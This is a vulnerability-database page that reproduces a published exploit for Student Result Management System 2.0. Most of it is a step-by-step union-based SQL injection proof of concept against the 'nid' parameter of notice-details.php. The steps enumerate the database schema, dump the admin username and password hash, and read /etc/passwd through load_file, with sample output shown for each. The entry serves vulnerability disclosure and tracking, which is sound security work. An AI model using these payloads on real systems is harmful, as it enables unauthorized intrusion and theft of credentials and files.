Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Student Result Management System 2.0 SQL Injection / Local File Inclusion

🗓️ 22 Aug 2025 00:00:00Reported by Mehmet Can KadıoğluType 
packetstorm
 packetstorm🔗 packetstorm.news👁 274 Views

Unauth SQLi and Local File Inclusion in Student Result Management System 2.0; PoC shows /etc/passwd

Code
# Exploit Title: Student Result Management System v2.0 Unauthenticated
    SQL Injection / Local File Inclusion
    # Date: 2025-08-22
    # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
    # Vendor: https://phpgurukul.com/student-result-management-system/
    # Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/
    # Tested on: Arch Linux
    # CVE: N/A
    
    PoC:
    Click on an article on the notice board at random and parameter 'nid' is
    vulnerable to union-based sql injection
    1-  for version information
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION SELECT 1,version(),3,4-- -
    10.11.7-MariaDB-42- get databases on the server
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -
    
    information_schemasrms
    
    3-  tables in the srms database
    
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE
    table_schema='srms'-- -
    admintblnoticetblstudents
    4- get columns in table admin
    
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE
    table_name='admin'-- -
    
    UserNamePassword
    
    5- dump data
    
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION ALL SELECT 1,concat(UserName,":",Password),3,4 FROM srms.admin-- -
    admin:f925916e[REDACTED]533251
    
    6- get local file (/etc/passwd)
    
    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
    UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -
    
    root:x:0:0:root:/root:/usr/bin/zsh
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ....

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Aug 2025 00:00Current
8.6High risk
Vulners AI Score8.6
unauthenticated accessinjection vulnerabilitylocal file inclusionstudent result managementpassword file
274